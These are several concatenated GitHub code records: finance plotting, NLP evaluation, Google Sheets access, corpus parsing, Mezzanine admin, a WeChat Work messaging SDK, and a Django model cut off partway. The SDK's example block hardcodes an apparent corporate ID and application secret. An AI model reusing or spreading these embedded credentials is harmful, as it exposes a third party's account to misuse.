simu_sht.range(\"r150\")\nsimu_sht.pictures.add(graph13, name = 'graph13', update = True,top = rng.top,left = rng.left)\n\ngraph14 =plt.figure(figsize=(5,5))\nax = graph14.add_subplot(1, 1, 1)\ngraph14.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(roic_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('RONIC variation')\nplt.title('Distribution of RONIC variation',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z150\")\nsimu_sht.pictures.add(graph14, name = 'graph14', update = True,top = rng.top,left = rng.left)\n\ngraph15 =plt.figure(figsize=(5,5))\nax = graph15.add_subplot(1, 1, 1)\ngraph15.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(pg_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('Perpetual growth rate')\nplt.title('Distribution of perpetual growth rate', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r175\")\nsimu_sht.pictures.add(graph15, name = 'graph15', update = True,top = rng.top,left = rng.left)\n\ngraph16 =plt.figure(figsize=(5,5))\nax = graph16.add_subplot(1, 1, 1)\ngraph16.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(ev_ebitda_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('EV-to-EBITDA variation')\nplt.title('Distribution of EV-to-EBITDA', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z175\")\nsimu_sht.pictures.add(graph16, name = 'graph16', update = True,top = rng.top,left = rng.left)\n\ngraph17 =plt.figure(figsize=(5,5))\nax = graph17.add_subplot(1, 1, 1)\ngraph17.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(ev_sales_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('EV-to-Sales variation')\nplt.title('Distribution of EV-to-Sales',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r200\")\nsimu_sht.pictures.add(graph17, name = 'graph17', update = True,top = rng.top,left = rng.left)\n\ngraph18 =plt.figure(figsize=(5,5))\nax = graph18.add_subplot(1, 1, 1)\ngraph18.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(emp_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('Equity market premium variation')\nplt.title('Distribution of Equity market premium', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z200\")\nsimu_sht.pictures.add(graph18, name = 'graph18', update = True,top = rng.top,left = rng.left)\n\n\n# #### details on some key statistics\n\n# In[203]:\n\n\ndesc_stat=df.describe()\nsimu_sht.range('R224').value = desc_stat\n\n\n# #### Correlation between each variable and Value per share\n\n# In[204]:\n\n\ncorr1 =plt.figure(figsize=(5,5))\nax = corr1.add_subplot(1, 1, 1)\ncorr1.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g1_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (smartphone) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al1\") \nsimu_sht.pictures.add(corr1, name = 'corr1', update = True,top = rng.top,left = rng.left)\n\ncorr2 =plt.figure(figsize=(5,5))\nax = corr2.add_subplot(1, 1, 1)\ncorr2.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g2_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (TV) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at1\") \nsimu_sht.pictures.add(corr2, name = 'corr2', update = True,top = rng.top,left = rng.left)\n\ncorr3 =plt.figure(figsize=(5,5))\nax = corr3.add_subplot(1, 1, 1)\ncorr3.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g3_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (Internet services) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al25\") \nsimu_sht.pictures.add(corr3, name = 'corr3', update = True,top = rng.top,left = rng.left)\n\ncorr4 =plt.figure(figsize=(5,5))\nax = corr4.add_subplot(1, 1, 1)\ncorr4.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g4_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (Others) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at25\") \nsimu_sht.pictures.add(corr4, name = 'corr4', update = True,top = rng.top,left = rng.left)\n\ncorr5 =plt.figure(figsize=(5,5))\nax = corr5.add_subplot(1, 1, 1)\ncorr5.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(sga_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('SG&A')\nplt.title('Correlation : SG&A vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al50\") \nsimu_sht.pictures.add(corr5, name = 'corr5', update = True,top = rng.top,left = rng.left)\n\ncorr6 =plt.figure(figsize=(5,5))\nax = corr6.add_subplot(1, 1, 1)\ncorr6.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(rd_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('R&D')\nplt.title('Correlation : R&D vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"AT50\")\nsimu_sht.pictures.add(corr6, name = 'corr6', update = True,top = rng.top,left = rng.left)\n\ncorr7 =plt.figure(figsize=(5,5))\nax = corr7.add_subplot(1, 1, 1)\ncorr7.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c1_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (smartphone) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al75\")\nsimu_sht.pictures.add(corr7, name = 'corr7', update = True,top = rng.top,left = rng.left)\n\ncorr8 =plt.figure(figsize=(5,5))\nax = corr8.add_subplot(1, 1, 1)\ncorr8.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c2_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (TV) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at75\")\nsimu_sht.pictures.add(corr8, name = 'corr8', update = True,top = rng.top,left = rng.left)\n\ncorr9 =plt.figure(figsize=(5,5))\nax = corr9.add_subplot(1, 1, 1)\ncorr9.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c3_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (Internet services) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al100\")\nsimu_sht.pictures.add(corr9, name = 'corr9', update = True,top = rng.top,left = rng.left)\n\ncorr10 =plt.figure(figsize=(5,5))\nax = corr10.add_subplot(1, 1, 1)\ncorr10.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c4_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (Others) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at100\") \nsimu_sht.pictures.add(corr10, name = 'corr10', update = True,top = rng.top,left = rng.left)\n\ncorr11 =plt.figure(figsize=(5,5))\nax = corr11.add_subplot(1, 1, 1)\ncorr11.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(betaun_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Beta unlevered')\nplt.title('Correlation : Beta unlevered vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al125\")\nsimu_sht.pictures.add(corr11, name = 'corr11', update = True,top = rng.top,left = rng.left)\n\ncorr12 =plt.figure(figsize=(5,5))\nax = corr12.add_subplot(1, 1, 1)\ncorr12.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(roic_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('RONIC')\nplt.title('Correlation : RONIC vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at125\") \nsimu_sht.pictures.add(corr12, name = 'corr12', update = True,top = rng.top,left = rng.left)\n\n\ncorr13 =plt.figure(figsize=(5,5))\nax = corr13.add_subplot(1, 1, 1)\ncorr13.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(pg_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Perpetual growth rate')\nplt.title('Correlation : Perpetual growth rate vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al150\") \nsimu_sht.pictures.add(corr13, name = 'corr13', update = True,top = rng.top,left = rng.left)\n\ncorr14 =plt.figure(figsize=(5,5))\nax = corr14.add_subplot(1, 1, 1)\ncorr14.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(ev_ebitda_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('EV/EBITDA')\nplt.title('Correlation : EV/EBITDA vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at150\") \nsimu_sht.pictures.add(corr14, name = 'corr14', update = True,top = rng.top,left = rng.left)\n\ncorr15 =plt.figure(figsize=(5,5))\nax = corr15.add_subplot(1, 1, 1)\ncorr15.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(ev_sales_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('EV/Sales')\nplt.title('Correlation : EV/Sales vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al175\")\nsimu_sht.pictures.add(corr15, name = 'corr15', update = True,top = rng.top,left = rng.left)\n\ncorr16 =plt.figure(figsize=(5,5))\nax = corr16.add_subplot(1, 1, 1)\ncorr16.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(emp_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Equity market premium')\nplt.title('Correlation : Equity market premium vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at175\") \nsimu_sht.pictures.add(corr16, name = 'corr16', update = True,top = rng.top,left = rng.left)\n\n","repo_name":"keatti/Advanced-Corporate-Finance---Group-2","sub_path":"Monte Carlo Simulation (script).py","file_name":"Monte Carlo Simulation (script).py","file_ext":"py","file_size_in_byte":25648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34409614708","text":"from __future__ import annotations\n\nfrom typing import Dict, List, Tuple, Callable\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom .constants import KEYS, CARDINALITIES\n\n\ndef create_initial_results(categories: List[str], keys: List[str]) -> Dict[str, Dict[str, List[float]]]:\n results = {}\n for cat in categories:\n results[cat] = {}\n for key in keys:\n results[cat][key] = []\n return results\n\n\nclass SentenceComparison:\n def __init__(self,\n relations: List[str],\n templater: Callable[[str, str, str], Dict[str, str]],\n metric: Callable,\n mask: str,\n get_relation_meta: Callable,\n keys=None):\n if keys is None:\n keys = KEYS\n self.relations: List[str] = relations\n self.templater: Callable[[str, str, str], Dict[str, str]] = templater\n self.metric: Callable = metric\n self.mask: str = mask\n self.keys: List[str] = keys\n self.results: Dict = create_initial_results(self.relations, self.keys)\n self.total_result: Dict[str, List[float]] = {key: [] for key in self.keys}\n self.cardinality_result: Dict = create_initial_results(CARDINALITIES, self.keys)\n self.get_relation_meta: Callable[[str], str] = get_relation_meta\n\n\n def compare(self, triples: Dict[str, List[Tuple[str, str]]]):\n for relation in self.relations:\n for sub, obj in tqdm(triples[relation]):\n sentences: Dict[str, str] = self.templater(relation, sub, self.mask)\n for key in self.keys:\n res: float = self.metric(sentences[key], obj)\n card: str = self.get_relation_meta(relation).split(\" \")[-1]\n self.results[relation][key].append(res)\n self.cardinality_result[card][key].append(res)\n self.total_result[key].append(res)\n\n def plot_comparison_for_relation(self, relation: str, title: str):\n fig, ax = plt.subplots()\n ax.set(xlabel='triplet nr.', ylabel=title, title=title)\n\n ax.set_title(f\"{relation}:{self.get_relation_meta(relation)}\")\n\n for index, (key, dataset) in enumerate(self.results[relation].items()):\n x_data: List[int] = list(range(len(dataset)))\n ax.scatter(x_data, dataset, marker=str((index % 4) + 1), label=f\"{key}\")\n\n ax.legend(loc='upper right')\n plt.show()\n\n def make_global_comparison(self) -> List[List[str]]:\n rows: List[List[str]] = []\n for relation in self.relations:\n means: List[float] = [np.mean(self.results[relation][key]).item() for key in self.keys]\n row: List[str] = [relation] + [\"{:.3f}\".format(mean) for mean in means]\n rows.append(row)\n return rows\n\n def print_global_for_latex(self):\n rows: List[List[str]] = self.make_global_comparison()\n rows = sorted(rows, key=lambda lst: int(lst[0][1:]))\n for row in rows:\n print(\" & \".join(row) + \"\\\\\\\\\")\n\n def plot_heat_map(self, metric: Callable, title: str):\n\n heat_values: np.ndarray = np.array(\n [[metric(self.total_result[left_key], self.total_result[right_key])\n for left_key in self.keys] for right_key in self.keys])\n\n fig, ax = plt.subplots()\n ax.imshow(heat_values)\n\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n ax.set_xticks(np.arange(len(self.keys)), labels=self.keys)\n ax.set_yticks(np.arange(len(self.keys)), labels=self.keys)\n\n for row in range(len(self.keys)):\n for col in range(len(self.keys)):\n ax.text(col, row, heat_values[row, col], ha=\"center\", va=\"center\", color=\"w\")\n\n ax.set_title(title)\n plt.show()\n\n def results_for_persistence(self) -> List[Tuple[str, None | str, float]]:\n rows: List[Tuple[str, None | str, float]] = []\n\n for key in self.keys:\n key_mean: float = np.mean(self.total_result[key]).item()\n if not np.isnan(key_mean):\n rows.append((key, None, key_mean))\n\n for card in CARDINALITIES:\n card_mean: float = np.mean(self.cardinality_result[card][key]).item()\n if not np.isnan(card_mean):\n rows.append((key, card, card_mean))\n\n for rel in self.relations:\n rel_mean: float = np.mean(self.results[rel][key]).item()\n if not np.isnan(rel_mean):\n rows.append((key, rel, rel_mean))\n\n return rows\n","repo_name":"Thrasolt/ContextualKnowledgeOfLMs","sub_path":"SyntaxTransformation/SentenceComparison/SentenceComparison.py","file_name":"SentenceComparison.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23475851464","text":"from pprint import pprint\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nimport httplib2\nimport googleapiclient\nfrom googleapiclient import discovery\n\nCREDENTIALS_FILE = 'creds.json'\nspreadsheet_id = \"119zT2AFXdJvJHPrd5PR1sCpnU8NMNk5S\"\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n CREDENTIALS_FILE,\n 'https://www.googleapis.com/auth/spreadsheets')\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = googleapiclient.discovery.build('sheets', 'v4', http=httpAuth)\n\nvalues = service.spreadsheets().values().get(\n spreadsheetId=spreadsheet_id,\n range='B1E10',\n majorDimension='ROWS')\nresponse = values.execute()\npprint(response)\n","repo_name":"writeln2012/Newton.by","sub_path":"google_sheets.py","file_name":"google_sheets.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34999588198","text":"# -*- coding: utf-8 -*-\nimport re\nfrom lxml import etree\n\nclass PossibleGroupFinder(object):\n \n def __init__(self, xml=None, db_config=None):\n if not xml and not db_config:\n raise Exception(\"Path to neither xml dump nor config.json provided\")\n \n if xml:\n self._finder = XMLGroupFinder(xml)\n else:\n self._finder = DBGroupFinder(db_config)\n\n def find(self, pattern):\n return self._finder.find(pattern)\n\n\nclass XMLGroupFinder(object):\n\n class Finder(object):\n \n def __init__(self, pattern):\n self._reset()\n self.found = []\n\n self.pattern = []\n assert isinstance(pattern, (tuple, list))\n if len(pattern) < 2:\n raise Exception(\"Too short pattern provided\")\n for el in pattern:\n self.pattern.append(re.compile(el, re.I))\n\n def _reset(self):\n self.context = []\n self.sent_id = None\n self.sent_fulltext = ''\n self.in_source = False\n\n def start(self, tag, attr):\n if tag == 'token':\n self.context.append((int(attr['id']), attr['text'].encode('utf-8')))\n elif tag == 'sentence':\n self.sent_id = int(attr['id'])\n elif tag == 'source':\n self.in_source = True\n\n def data(self, data):\n if self.in_source:\n self.sent_fulltext += data.encode('utf-8')\n\n def end(self, tag):\n if tag == 'sentence':\n self._reset()\n elif tag == 'token':\n self.check_current_context()\n elif tag == \"source\":\n self.in_source = False\n\n def close(self):\n pass\n\n def check_current_context(self):\n length = len(self.pattern)\n if len(self.context) < length:\n return\n for i, el in enumerate(self.pattern):\n if not re.match(el, self.context[i - length][1]):\n return\n # context matched\n self.found.append(PossibleGroup(\n [x[0] for x in self.context[-length:]],\n [x[1] for x in self.context[-length:]],\n self.sent_id,\n self.sent_fulltext\n ))\n\n \n def __init__(self, xml_path):\n self.xml_path = xml_path\n\n def find(self, pattern):\n \"\"\" returns a list of tuples of token ids \"\"\"\n finder = self.Finder(pattern)\n parser = etree.XMLParser(target = finder)\n etree.parse(self.xml_path, parser)\n return finder.found\n\n\nclass PossibleGroup(object):\n \n def __init__(self, ids, tokens, sentence_id, sentence_fulltext):\n self.ids = tuple(ids)\n self.tokens = tokens\n self.sentence_id = sentence_id\n self.sentence_fulltext = sentence_fulltext\n\n def __repr__(self):\n return 'PossibleGroup([{0}], \"{1}\", sentence_id = {2}, sentence_fulltext = \"{3}\")'.format(\n ','.join(map(str, self.ids)),\n ' '.join(self.tokens),\n self.sentence_id,\n self.sentence_fulltext\n )\n","repo_name":"OpenCorpora/opencorpora","sub_path":"python/Syntax.py","file_name":"Syntax.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"37"} +{"seq_id":"30157192766","text":"\nfrom hermetic.core.presenter import Presenter\n\nclass ScriptPresenter(Presenter):\n def present(self, agent):\n print(agent.greet())\n while True:\n print('> ', end='')\n inp = input()\n for word in agent.process_input(inp):\n print(word, end='')\n print()","repo_name":"anyscale/hermetic","sub_path":"src/hermetic/presenters/script_presenter.py","file_name":"script_presenter.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"32096811823","text":"\nfrom copy import deepcopy\n\nfrom django.contrib import admin\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom mezzanine.pages.models import Page, RichTextPage, Link\nfrom mezzanine.core.admin import DisplayableAdmin\nfrom mezzanine.utils.urls import admin_url\n\n\npage_fieldsets = deepcopy(DisplayableAdmin.fieldsets)\npage_fieldsets[0][1][\"fields\"] += ((\"in_navigation\", \"in_footer\"),\n \"login_required\",)\n\n\nclass PageAdmin(DisplayableAdmin):\n \"\"\"\n Admin class for the ``Page`` model and all subclasses of\n ``Page``. Handles redirections between admin interfaces for the\n ``Page`` model and its subclasses.\n \"\"\"\n\n fieldsets = page_fieldsets\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n For ``Page`` subclasses that are registered with an Admin class\n that doesn't implement fieldsets, add any extra model fields\n to this instance's fieldsets. This mimics Django's behaviour of\n adding all model fields when no fieldsets are defined on the\n Admin class.\n \"\"\"\n super(PageAdmin, self).__init__(*args, **kwargs)\n # Test that the fieldsets don't differ from PageAdmin's.\n if self.model is not Page and self.fieldsets == PageAdmin.fieldsets:\n # Make a copy so that we aren't modifying other Admin\n # classes' fieldsets.\n self.fieldsets = deepcopy(self.fieldsets)\n # Insert each field between the publishing fields and nav\n # fields. Do so in reverse order to retain the order of\n # the model's fields.\n for field in reversed(self.model._meta.fields):\n if field not in Page._meta.fields and field.name != \"page_ptr\":\n self.fieldsets[0][1][\"fields\"].insert(3, field.name)\n\n def in_menu(self):\n \"\"\"\n Hide subclasses from the admin menu.\n \"\"\"\n return self.model is Page\n\n def _check_permission(self, request, page, permission):\n \"\"\"\n Runs the custom permission check and raises an\n exception if False.\n \"\"\"\n if not getattr(page, \"can_\" + permission)(request):\n raise PermissionDenied\n\n def add_view(self, request, extra_context=None, **kwargs):\n \"\"\"\n For the ``Page`` model, redirect to the add view for the\n ``RichText`` model.\n \"\"\"\n if self.model is Page:\n try:\n add_url = admin_url(RichTextPage, \"add\")\n return HttpResponseRedirect(add_url)\n except NoReverseMatch:\n pass\n return super(PageAdmin, self).add_view(request, **kwargs)\n\n def change_view(self, request, object_id, extra_context=None):\n \"\"\"\n For the ``Page`` model, check ``page.get_content_model()``\n for a subclass and redirect to its admin change view.\n Also enforce custom change permissions for the page instance.\n \"\"\"\n page = get_object_or_404(Page, pk=object_id)\n content_model = page.get_content_model()\n self._check_permission(request, content_model, \"change\")\n if self.model is Page:\n if content_model is not None:\n change_url = admin_url(content_model.__class__, \"change\",\n content_model.id)\n return HttpResponseRedirect(change_url)\n extra_context = extra_context or {}\n extra_context[\"hide_delete_link\"] = not page.can_delete(request)\n extra_context[\"hide_slug_field\"] = page.overridden()\n return super(PageAdmin, self).change_view(request, object_id,\n extra_context=extra_context)\n\n def delete_view(self, request, object_id, extra_context=None):\n \"\"\"\n Enforce custom delete permissions for the page instance.\n \"\"\"\n page = get_object_or_404(Page, pk=object_id)\n content_model = page.get_content_model()\n self._check_permission(request, content_model, \"delete\")\n return super(PageAdmin, self).delete_view(request, object_id,\n extra_context)\n\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n Redirect to the ``Page`` changelist view for ``Page``\n subclasses.\n \"\"\"\n if self.model is not Page:\n return HttpResponseRedirect(admin_url(Page, \"changelist\"))\n return super(PageAdmin, self).changelist_view(request, extra_context)\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n Set the ID of the parent page if passed in via querystring.\n \"\"\"\n # Force parent to be saved to trigger handling of ordering and slugs.\n parent = request.GET.get(\"parent\")\n if parent is not None and not change:\n obj.parent_id = parent\n obj._order = None\n obj.slug = None\n obj.save()\n super(PageAdmin, self).save_model(request, obj, form, change)\n\n def _maintain_parent(self, request, response):\n \"\"\"\n Maintain the parent ID in the querystring for response_add and\n response_change.\n \"\"\"\n location = response._headers.get(\"location\")\n parent = request.GET.get(\"parent\")\n if parent and location and \"?\" not in location[1]:\n url = \"%s?parent=%s\" % (location[1], parent)\n return HttpResponseRedirect(url)\n return response\n\n def response_add(self, request, obj):\n \"\"\"\n Enforce page permissions and maintain the parent ID in the\n querystring.\n \"\"\"\n response = super(PageAdmin, self).response_add(request, obj)\n return self._maintain_parent(request, response)\n\n def response_change(self, request, obj):\n \"\"\"\n Enforce page permissions and maintain the parent ID in the\n querystring.\n \"\"\"\n response = super(PageAdmin, self).response_change(request, obj)\n return self._maintain_parent(request, response)\n\n\n# Drop the meta data fields, and move slug towards the stop.\nlink_fieldsets = deepcopy(page_fieldsets[:1])\nlink_fieldsets[0][1][\"fields\"] = link_fieldsets[0][1][\"fields\"][:-1]\nlink_fieldsets[0][1][\"fields\"].insert(1, \"slug\")\n\n\nclass LinkAdmin(PageAdmin):\n\n fieldsets = link_fieldsets\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n \"\"\"\n Make slug mandatory.\n \"\"\"\n if db_field.name == \"slug\":\n kwargs[\"required\"] = True\n return super(LinkAdmin, self).formfield_for_dbfield(db_field, **kwargs)\n\n\nadmin.site.register(Page, PageAdmin)\nadmin.site.register(RichTextPage, PageAdmin)\nadmin.site.register(Link, LinkAdmin)\n","repo_name":"zhiwehu/my_mezzanine","sub_path":"env/lib/python2.7/site-packages/mezzanine/pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30514290269","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\n\nimport requests\n\nfrom .exception import WeChatWorkSDKException\nfrom .mixin import ValidationMixin\n\n# 企业微信API根URL\n# WECHATWORK_API_ROOT_URL = os.environ.get('WECHATWORK_API_ROOT_URL', 'https://qyapi.weixin.qq.com/cgi-bin')\nWECHATWORK_API_ROOT_URL = os.environ.get('WECHATWORK_API_ROOT_URL', 'https://qywxlocal.nesc.cn:7443/cgi-bin')\n\n\ndef get_access_token(corpid, secret) -> (str, int):\n \"\"\"\n 获取Access Token\n :param corpid: 企业ID\n :param secret: 应用密钥\n :return: (access_token, expires_in)\n - access_token: 获取到的凭证,最长为512字节\n - expires_in: 凭证的有效时间(秒),通常为7200\n \"\"\"\n url = f'{WECHATWORK_API_ROOT_URL}/gettoken?corpid={corpid}&corpsecret={secret}'\n data = json.loads(requests.get(url).content)\n if int(data['errcode']) == 0:\n return data['access_token'], int(data['expires_in'])\n else:\n raise WeChatWorkSDKException(data['errcode'], data['errmsg'])\n\n\nclass WeChatWorkSDK(ValidationMixin):\n \"\"\"\n 企业微信SDK基本类\n \"\"\"\n API_ROOT_URL = WECHATWORK_API_ROOT_URL\n\n def __init__(self, corpid, secret):\n \"\"\"\n :param corpid:\n :param secret:\n \"\"\"\n self.corpid = corpid\n self.secret = secret\n self._access_token = None\n\n @property\n def access_token(self):\n \"\"\"\n 获取access_token\n 详细说明:https://work.weixin.qq.com/api/doc/90000/90135/91039\n\n :return access_token: str\n \"\"\"\n # 新创建的实例或者access_token过期,请求access_token并缓存\n if self._access_token is None:\n access_token, expires_in = get_access_token(corpid=self.corpid, secret=self.secret)\n self._access_token = access_token\n return self._access_token\n\n def _clean_cached_access_token(self):\n self._access_token = None\n\n def request_api(self, method, api, query_params=None, data=None):\n # 拼接API的URL\n url = self.API_ROOT_URL + api\n\n # 默认必须传入access_token\n if query_params is None:\n query_params = dict()\n query_params['access_token'] = self.access_token\n\n # API接口要求必须以JSON格式传入数据\n content = requests.request(method, url, params=query_params, json=data).content\n if not content:\n raise WeChatWorkSDKException('self-defined', 'API接口不存在')\n return_data = json.loads(content)\n\n # 处理access_token过期\n if int(return_data['errcode']) == 42001:\n # 清空缓存的access_token\n self._clean_cached_access_token()\n # 重新请求\n return self.request_api(method, api, query_params, data)\n\n # 抛出异常\n if int(return_data['errcode']) != 0:\n raise WeChatWorkSDKException(return_data['errcode'], return_data['errmsg'])\n\n # 返回正常数据时删除errcode=0和errmsg='ok'\n return_data.pop('errcode')\n return_data.pop('errmsg')\n return return_data\n\n def get_api(self, api, query_params=None):\n return self.request_api('GET', api, query_params)\n\n def post_api(self, api, query_params=None, data=None):\n return self.request_api('POST', api, query_params, data)\n\n ########################自定义\n def _send(self, data=None):\n if data is None:\n data = {\n \"touser\": \"7683\",\n\n \"msgtype\": \"text\",\n \"agentid\": 1000041,\n \"text\": {\n \"content\": \"🐅\"\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0\n }\n\n url = f'{self.API_ROOT_URL}/message/send?access_token={self.access_token}'\n return requests.post(url, json=data)\n\n def send_file(self, path, type='file', touser=\"7605|7683\", agentid=1000041):\n upload_media_url = f\"{self.API_ROOT_URL}/media/upload?access_token={self.access_token}&type={type}\"\n\n with open(path, 'rb') as f:\n files = {'data': f}\n response = requests.post(upload_media_url, files=files)\n try:\n media_id = response.json()['media_id']\n\n data = {\n \"touser\": touser, # \"@all\"\n\n \"msgtype\": type,\n \"agentid\": agentid,\n type: {\n \"media_id\": media_id\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0\n }\n\n return self._send(data)\n\n except Exception as e:\n print(e)\n return response.json()\n\n\nif __name__ == '__main__':\n from wecom import WeChatWorkSDK\n\n we = WeChatWorkSDK('ww3c6024bb94ecef59x', 'empKNMx-RSgd4tK6uzVA56qCl1QY6eErRdSb7Hr5vyQ')\n we.send_file(\"/Users/yuanjie/Desktop/111.jpeg\", touser='@all', type='image')\n","repo_name":"yuanjie-ai/wecom","sub_path":"wecom/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43398623551","text":"from api import exceptions as exc\nfrom core.models import StatsBaseModel\nfrom django.db import models\nfrom users.models import Patient\n\n\nclass StatType(StatsBaseModel):\n \"\"\"Типы показателей\"\"\"\n\n FLOAT = 'float'\n INT = 'int'\n\n TYPES = (\n (FLOAT, 'Число с плавающей точкой'),\n (INT, 'Целое число'),\n )\n\n slug = models.SlugField(\n verbose_name='Уникальное название',\n max_length=32,\n unique=True\n )\n name = models.CharField(\n verbose_name='Наименование',\n max_length=120\n )\n description = models.TextField(\n verbose_name='Описание',\n max_length=512,\n blank=True,\n null=True\n )\n data_type = models.CharField(\n verbose_name='Тип данных',\n choices=TYPES,\n 